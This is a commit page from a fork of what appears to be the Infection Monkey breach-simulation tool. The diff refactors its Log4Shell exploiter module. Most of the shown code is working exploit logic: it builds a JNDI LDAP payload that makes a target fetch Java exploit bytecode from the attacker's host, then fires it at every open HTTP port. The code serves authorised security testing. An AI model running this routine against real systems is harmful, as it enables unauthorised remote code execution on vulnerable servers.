p34709852
/
monkey
forked from p15670423/monkey
1
0
Fork 1
Code Issues Pull Requests Projects Releases Wiki Activity

Agent: remove unused upload_monkey() and rename _trigger_exploit

This commit is contained in:
vakarisz 2022-01-06 13:00:37 +02:00
parent 7bace927f8
commit 0cd6b1e616
1 changed files with 18 additions and 24 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

42
monkey/infection_monkey/exploit/log4shell.py
View File

@ -84,26 +84,6 @@ class Log4ShellExploiter(WebRCE):
# If java class was downloaded it means that victim is vulnerable # If java class was downloaded it means that victim is vulnerable
return Log4ShellExploiter.HTTPHandler.class_downloaded return Log4ShellExploiter.HTTPHandler.class_downloaded
def _trigger_exploit(self):
# Try to exploit all services,
# because we don't know which services are running and on which ports
open_ports = [
int(port[0]) for port in WebRCE.get_open_service_ports(self.host, self.HTTP, ["http"])
]
for exploit in get_log4shell_service_exploiters():
for port in open_ports:
exploit.trigger_exploit(self.build_ldap_payload(), self.host, port)
# Wait for request
sleep(Log4ShellExploiter.REQUEST_TO_VICTIM_TIME)
if Log4ShellExploiter.HTTPHandler.class_downloaded:
self.exploit_info["vulnerable_service"] = {
"service_name": exploit.service_name,
"port": port,
}
return
def build_ldap_payload(self): def build_ldap_payload(self):
interface_ip = get_interface_to_target(self.host.ip_addr) interface_ip = get_interface_to_target(self.host.ip_addr)
return f"${{jndi:ldap://{interface_ip}:{self.ldap_port}/dn=Exploit}}" return f"${{jndi:ldap://{interface_ip}:{self.ldap_port}/dn=Exploit}}"
@ -132,11 +112,25 @@ class Log4ShellExploiter(WebRCE):
else: else:
return build_exploit_bytecode(exploit_command, WINDOWS_EXPLOIT_TEMPLATE_PATH) return build_exploit_bytecode(exploit_command, WINDOWS_EXPLOIT_TEMPLATE_PATH)
def upload_monkey(self, url, commands=None):
pass
def exploit(self, url, command): def exploit(self, url, command):
pass # Try to exploit all services,
# because we don't know which services are running and on which ports
open_ports = [
int(port[0]) for port in WebRCE.get_open_service_ports(self.host, self.HTTP, ["http"])
]
for exploit in get_log4shell_service_exploiters():
for port in open_ports:
exploit.trigger_exploit(self.build_ldap_payload(), self.host, port)
# Wait for request
sleep(Log4ShellExploiter.REQUEST_TO_VICTIM_TIME)
if Log4ShellExploiter.HTTPHandler.class_downloaded:
self.exploit_info["vulnerable_service"] = {
"service_name": exploit.service_name,
"port": port,
}
return
class HTTPHandler(http.server.BaseHTTPRequestHandler): class HTTPHandler(http.server.BaseHTTPRequestHandler):